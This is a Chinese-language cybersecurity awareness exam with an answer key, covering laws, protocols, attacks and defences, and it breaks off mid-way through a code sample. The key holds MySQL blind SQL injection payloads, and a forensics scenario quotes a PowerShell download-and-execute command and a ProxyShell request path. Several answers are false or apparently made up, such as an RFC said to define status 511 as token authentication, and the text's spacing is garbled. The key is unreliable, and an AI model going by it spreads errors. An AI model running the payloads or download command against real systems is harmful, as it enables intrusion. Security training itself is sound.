2025年网络安全意识与培训试卷(含答案)

2025年网络安全意识与培训试卷(含答案)一、单项选择题（每题2分，共30分。每题只有一个正确答案，请将正确选项字母填在括号内）1.2024年11月，国家互联网应急中心（CNCERT）发布的《2024年上半年我国互联网网络安全态势综述》指出，占比最高的恶意程序传播方式是（）。A.水坑攻击  B.钓鱼邮件  C.即时通讯暗链  D.供应链污染答案：B2.某员工收到一封“公司财务部”发来的带宏Excel附件的邮件，发件人域名与真实域名仅差一个字母。该攻击手法最准确的定义是（）。A.鱼叉钓鱼  B.捕鲸  C.域名仿冒钓鱼  D.商业邮件妥协（BEC）答案：C3.在Windows1123H2家庭版中，默认启用且能有效阻止LMHash暴力破解的账户安全策略是（）。A.关闭NTLMv1  B.启用CredentialGuard  C.启用LSAProtection  D.设置帐户锁定阈值答案：B4.根据《个人信息保护法》第四十五条，个人信息处理者向境外提供个人信息时，必须事前进行的措施是（）。A.向省级以上网信部门申请数据出境安全评估  B.向公安部备案  C.向国家密码局申请加密认可  D.向市场监管总局申请标准合同备案答案：A5.2025年1月1日起正式实施的《数据安全技术数据分类分级规则》（GB/T436972024）中，将“一旦泄露可致特别重大生产安全事故”的数据定为（）级。A.核心  B.重要  C.一般  D.敏感答案：A6.在Linux内核5.15及以上版本，可针对特定进程实施动态内存隔离的防御机制是（）。A.SELinux  B.AppArmor  C.LandlockLSM  D.Smack答案：C7.某企业采用FIDO2+生物特征实现无密码登录，其生物模板存储在本地安全芯片中。该方案最能抵御的威胁是（）。A.重放攻击  B.中间人攻击  C.数据库拖库  D.侧信道攻击答案：C8.2024年曝光的“Nokoyawa”勒索软件家族主要利用的初始访问向量是（）。A.暴露的RDP  B.微软ExchangeProxyShell  C.FortinetSSLVPN漏洞  D.Log4j2JNDI注入答案：C9.在零信任架构中，持续信任评估引擎（ContinuousTrustEvaluationEngine）最主要依赖的数据源不包括（）。A.终端EDR日志  B.物理门禁刷卡记录  C.身份与访问管理（IAM）事件  D.网络流量元数据答案：B10.某Web应用使用JWT作为会话令牌，header中alg字段值为“none”。攻击者通过修改payload提升权限，该漏洞名称是（）。A.JWT弱密钥  B.JWT算法混淆  C.JWT空加密  D.JWT密钥泄露答案：C11.在IPv6网络中，用于替代ARP协议并可能被滥用于本地主机发现的协议是（）。A.DHCPv6  B.ICMPv6RouterAdvertisement  C.ICMPv6NeighborDiscovery  D.MLDP答案：C12.2024年欧盟NIS2指令要求关键行业实体在发生重大事件后向主管部门报告的最长时限是（）。A.4小时  B.12小时  C.24小时  D.72小时答案：C13.在Android14中，可阻止已安装应用读取设备已安装应用列表的新权限是（）。A.QUERY_ALL_PACKAGES  B.GET_INSTALLED_APPS  C.PACKAGE_USAGE_STATS  D.PACKAGE_ROLLBACK_AGENT答案：A14.某云租户在阿里云OSS开启了“KMS托管密钥加密”，以下哪项操作会导致对象无法被合法下载（）。A.禁用对应KMSCMK  B.旋转CMK别名  C.将BucketACL改为私有  D.开启版本控制答案：A15.2025年3月，IETF发布的RFC9500将哪种HTTP状态码正式定义为“TokenAuthenticationRequired”？（）A.401  B.403  C.511  D.901答案：C二、多项选择题（每题3分，共30分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）16.以下哪些技术措施可有效防止DNS劫持攻击？（  ）A.DNSSEC  B.DoH  C.DoT  D.基于RPZ的DNS防火墙  E.关闭53端口出站UDP答案：ABCD17.关于我国《关键信息基础设施安全保护条例》，下列说法正确的有（  ）A.保护工作部门应组织应急演练每年至少一次B.运营者采购网络产品或服务影响国家安全的，应通过国家安全审查C.运营者发生合并、分立时，应及时报告保护工作部门D.运营者应当对关键岗位人员进行背景审查E.条例将“重要数据”纳入关键信息基础设施范围答案：ABCD18.以下哪些属于OWASPAPISecurityTop10(2023)中列出的风险？（  ）A.BrokenObjectLevelAuthorization  B.ExcessiveDataExposure  C.LackofResources&RateLimitingD.MassAssignment  E.SecurityMisconfiguration答案：ABCDE19.在Windows环境中，可用于远程获取系统内存镜像的开源工具有（  ）A.WinPmem  B.MagnetRAMCapture  C.FTKImager  D.Dumplt  E.Volatility3答案：ABCD20.以下关于SM4分组密码算法的描述正确的有（  ）A.分组长度128位  B.密钥长度128位  C.采用Feistel结构  D.加密与解密算法相同，仅轮密钥顺序相反E.已被ISO/IEC180333:2020采纳答案：ABDE21.在Linux系统加固中，可限制root用户通过SSH直接登录的措施包括（  ）A.修改/etc/ssh/sshd_config中PermitRootLogin为noB.将root账户加入/etc/ssh/deny_usersC.使用PAM模块pam_succeed_if.so限制uid=0D.在~root/.ssh/authorized_keys前加command=””限制E.将SSH端口改为2222答案：ACD22.以下哪些属于《信息安全技术网络安全等级保护测评要求》（GB/T284482019）第四级安全测评的“入侵防范”控制点？（  ）A.应在关键网络节点处检测、防止或限制网络攻击行为B.应能对高级持续威胁（APT）进行检测与报警C.应限制不同类型网络之间的非法访问D.应采用可信验证机制对计算环境进行动态可信验证E.应能对远程运维命令进行审计答案：ABCD23.某企业采用Kubernetes1.29，以下哪些配置或策略可防止容器逃逸？（  ）A.启用PodSecurityPolicy（PSP）并设置privileged=falseB.使用SeccompProfile限制系统调用C.启用AppArmor或SELinuxD.将/var/run/docker.sock挂载为只读E.在kubelet中关闭anonymousauth答案：ABCE24.以下关于量子计算对密码学影响的描述正确的有（  ）A.Shor算法可在多项式时间内破解RSAB.Grover算法可将AES128的有效密钥长度降至约64位C.我国已发布《抗量子密码算法征集指南（2024年）》D.NIST已标准化CRYSTALSKYBER与CRYSTALSDILITHIUME.量子计算机目前已可运行2048位Shor算法答案：ABCD25.以下哪些日志源可被用于检测Kerberoasting攻击？（  ）A.WindowsEventID4768（TGT请求）B.EventID4769（TGS请求）C.EventID4771（Kerberos预认证失败）D.EventID4672（特殊权限登录）E.EventID4624（成功登录）答案：ABC三、判断题（每题1分，共10分。正确打“√”，错误打“×”）26.在iOS17中，Lockdown模式会默认关闭iMessage的JIT编译器。  答案：√27.使用SHA256对8字节随机盐加口令进行单次哈希，可满足GB/T397862021对四级系统口令存储的最低要求。  答案：×28.2024年12月起，Chrome浏览器已全面禁用第三方Cookie，导致所有跨站请求默认不携带Cookie。  答案：×29.在Wireshark中，过滤表达式“tcp.flags.reset==1”可显示所有TCPRST报文。  答案：√30.我国《密码法》将核心密码、普通密码、商用密码全部纳入行政许可管理。  答案：×31.基于硬件的TrustedPlatformModule（TPM）可用于安全存储BitLocker恢复密钥。  答案：√32.在SQL注入中，使用“UNIONSELECT”必须保证原始查询与注入查询的列数相同。  答案：√33.2025年1月，OpenSSL3.2发布，已默认启用TLS1.3并废弃TLS1.0/1.1。  答案：√34.在Metasploit中，使用“setEnableStageEncodingtrue”可对Stage载荷进行编码，从而绕过所有反病毒软件。  答案：×35.根据《网络安全审查办法》，超过100万用户个人信息的运营者赴国外上市必须申报网络安全审查。  答案：√四、填空题（每空2分，共30分）36.2024年爆发的“LibreOffice”宏病毒利用的是______语言编写宏，其默认后缀为______。答案：Python、.py37.在Windows日志中，事件ID______表示WMI事件订阅被创建，常被用于持久化。答案：1938.在Linux中，使用______命令可查看当前系统所有监听中的TCP端口及其对应的进程PID。答案：ssltnp39.我国商用密码算法SM2基于的数学难题是______。答案：椭圆曲线离散对数问题（ECDLP）40.在Kubernetes中，NetworkPolicy资源基于______插件实现网络隔离。答案：CNI（ContainerNetworkInterface）41.在OWASPMASVS2.0中，控制项“V2.4”要求对______存储的密钥进行加密，防止物理提取。答案：静态/本地42.在IPv6地址2001:0db8:85a3::8a2e:0370:7334中，双冒号压缩了______个16位组。答案：343.2024年NISTSP80063B修订版将在线guessing攻击中允许的最多失败认证次数定为______次。答案：10044.在Wireshark中，使用表达式______可过滤出所有HTTP/2流量。答案：http245.在Android逆向中，使用______工具可将APK中的classes.dex反编译为Java源码。答案：jadx46.在TLS1.3握手过程中，用于加密EarlyData的密钥派生自______。答案：PSK（PreSharedKey）47.在WindowsDefender中，可通过______命令行工具更新威胁定义签名。答案：MpCmdRunSignatureUpdate48.根据《数据安全法》，违反国家核心数据管理制度，危害国家主权、安全和发展利益的，最高可处以______万元罚款。答案：100049.在Metasploit中，使用______模块可对目标进行“永恒之蓝”漏洞扫描。答案：ms17_010_eternalblue50.在Linux中，设置内核参数kernel.kptr_restrict=2的作用是______。答案：禁止非特权用户读取/proc/kallsyms中的内核符号地址五、简答题（共30分）51.（封闭型，8分）简述Kerberos认证协议中“黄金票据”攻击的原理，并给出两种检测方法。答案：原理：攻击者获取KRBTGT账户的NTLMHash后，可离线构造任意域用户TGT（黄金票据），无需KDC参与即可访问任意服务。检测：1.监控EventID4768中TGT加密类型为RC4且请求用户与常规不符；2.利用SIEM比对TGT中授权时间与首次登录时间差异超过阈值（如10分钟）。52.（开放型，10分）某电商平台计划引入“零信任”架构，请结合NISTSP800207，给出数据平面与控制平面的设计要点，并指出两项落地难点。答案：数据平面：1.所有访问请求经代理网关强制加密与身份校验；2.微分段策略下沉至工作负载，基于mTLS双向认证；3.持续元数据采集（进程、网络、用户行为）上传控制平面。控制平面：1.策略引擎基于信任评分动态授权；2.身份与上下文存储于统一IAM，支持OAuth2.0、SAML、FIDO2；3.审计与合规中台实时对接SOAR。难点：1.传统应用无法注入Sidecar，需改造或采用网络层透明代理，性能损耗>5%；2.持续信任评分需多源数据，现有日志格式不统一，数据清洗成本高。53.（封闭型，6分）列出SQL注入中“布尔盲注”利用的两种判断方式，并给出各一条MySQL示例payload。答案：1.响应长度差异：'AND(SELECTLENGTH(user())=14)+2.响应时间差异：'ANDIF(ORD(SUBSTRING((SELECTdatabase()),1,1))>100,SLEEP(3),0)+54.（开放型，6分）说明为何在5G核心网中引入SBA（ServiceBasedArchitecture）后，NF之间的OAuth2.0令牌可能成为新的攻击面，并提出两条缓解措施。答案：原因：NF间调用采用HTTP/2+OAuth2.0，令牌一旦泄露或伪造，攻击者可横向调用敏感服务（如UDM、AUSF），获取用户密钥或签约数据。缓解：1.令牌绑定NF实例指纹（TLS证书哈希），实现senderconstrainedtoken；2.在NRF增加动态范围限制，令牌仅可调用预授权API列表，采用短有效期（≤5分钟）+自动轮换。六、综合应用题（共30分）55.（分析类，15分）阅读场景并回答问题。场景：某国企在内网部署了ExchangeServer2019，2025年4月15日10:00，安全设备发现大量外联至9的443端口，源端口为高位随机，SNI字段为“”。经取证，获得一段PowerShell命令：powershellnopc“$b=NewObjectNet.WebClient;$b.Proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX$b.DownloadString(‘hxxps://9:443/images/logo.gif’);”（1）指出该攻击所处的杀伤链阶段，并说明判断依据。（3分）（2）给出两条检测此类外联的规则（SIEM或NDR）。（4分）（3）说明如何验证Exchange是否被ProxyShell漏洞利用，并写出一条Python3脚本调用ExchangeWebServices获取用户列表的示例代码片段。（5分）（4）列出清除持久化与后门的三个关键步骤。（3分）答案：（1）阶段：CommandandControl（C2）。依据：PowerShell从外网下载并执行远程脚本，符合C2通道建立特征。（2）规则：1.SIEM：事件类型=代理连接AND目标域名=AND目标端口=443AND进程名=powershell.exe；2.NDR：TLSSNI=AND外联IP首次出现AND证书颁发者非公共CA。（3）验证：检查IIS日志是否存在POST/autodiscover/autodiscover.json@/autodiscover/autodiscover.json?Protocol=AutodiscoverV1&…且返回200。Python3示例：```pythonfromexchangelibimportCredentials,Account,Configurationcreds=Credentials('admin@','AdminPass123')config=Configuration(server='',credentials=creds)account=Account('admin@',config=config,autodiscover=True)formbintocol